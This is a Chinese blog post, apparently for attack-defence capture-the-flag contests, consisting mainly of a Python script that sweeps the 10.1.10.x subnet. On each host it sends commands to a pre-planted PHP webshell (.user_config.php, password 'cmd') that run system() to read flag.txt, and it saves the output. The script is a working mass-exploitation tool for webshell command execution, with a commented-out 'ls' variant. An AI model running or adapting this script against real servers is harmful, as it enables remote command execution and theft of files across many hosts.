首页 > 其他分享 >批量获取flag

批量获取flag

时间:2022-12-06 15:58:12浏览次数:38  
标签:shell 批量 url res 获取 flag result print

#coding=utf-8
import requests
url_head="http://10.1.10."   #网段
url=""
shell_addr="/public/.user_config.php" #木马路径
password="cmd"                   #木马密码
#port="80"
payload = {
    password: 'system("cd /var/www/html ; cat flag.txt");'    #批量获取flag
    #password: 'system("ls");'
}
# find / -name "flag*"

flag=open("E:\\flag.txt", "a",encoding='utf-8')

for j in range(1,255):   #ip范围
    for i in range(80,81):   #端口范围
        url=url_head+str(j)+":"+str(i)+ shell_addr
        print(url)
        try:
            res=requests.post(url,payload)#,timeout=1
            if res.status_code == requests.codes.ok:
                result = res.text
                print (result)
                flag.write(result)
            else:
                print ("shell 404")
        except:
            print (url+" connect shell fail")

    flag.close()

  

标签:shell,批量,url,res,获取,flag,result,print
From: https://www.cnblogs.com/CloudStrife/p/16955493.html

相关文章

  • 记录一次 MyBatis 批量插入的优化-BatchInsert
    记录在一次项目问题排查过程中,遇到在数据量大的情况下,向数据库批量插入非常耗时长的问题。1、分析首先,代码是在service中,采用的是for循环调用insert语句的方式:for......
  • npm install时使用git协议无法获取资源错误
    npm中有些库需要从github上拉取,报错信息中提示:/bin/gitls-remote-h-tgit://github.com/adobe-webplatform/eve.gitfatal:unabletoconnecttogithub.com:github.......
  • springboot2 mongodb 高效批量入库--环境搭建
    当今使用微服务越来越多,每个服务都需要记录日志,那么记录到mysql中已完全不合适了。那么就记录到mongo中吧。想要速度快,那么一定要使用批量保存,做过尝试入库10万数据,逐条插......
  • 电子工程师芯片手册Datasheet获取途径
    1.最直接的方法就是去原厂官网上下载。这方面各大芯片厂商为用户考虑的都比较周到,一般常用器件在各个公司的官网上都能够按照器件型号查找并方便的下载到。如​​ti​​​,NX......
  • Vue中多条件图片路径通过Map存储获取避免嵌套if-else
    场景若依前后端分离版手把手教你本地搭建环境并运行项目:https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/108465662前端接收到后台数据之后需进行多个条件......
  • c++ 获取对象地址和从地址获取对象
    #include<iostream>usingnamespacestd;intmain(){constchar*a="Iamthedata";longlongaddr=(longlong)(std::addressof(a));cout<<"......
  • Flex中获取Application对象的方式
    Flex应用程序中的根标签是(Sparkapplication容器),或(MXApplication容器)。application容器是所有Flex组件的根,就像HTML文档中的<html>标签一样,所有的组件和脚本都将包......
  • 基于Xilinx FPGA的以太网接口的链接状态获取方法
    链接状态:pg138-axi-ethernet.pdf  《AXI1G/2.5GEthernetSubsystemv7.2》Figure2-38:PCSPMATEMACStatusRegister(0x0000_0030)比特位:PhyLinkStatuspg051-tri-......
  • wps word 批量修改表格样式
    https://www.ngui.cc/el/1276218.html?action=onClick Sub统一表格样式()''批量修改表格Macro'宏由zsz录制,时间:2020/05/07'DimtempTableAsTable......
  • 用百度SDK获取地理位置和天气信息
    下面实现通过百度SDK获取地理位置和天气信息,请参考​​百度开发文档​​1.在​​相关下载​​最新的库文件。将so文件的压缩文件解压出来,把对应架构下的so文件放入开发者......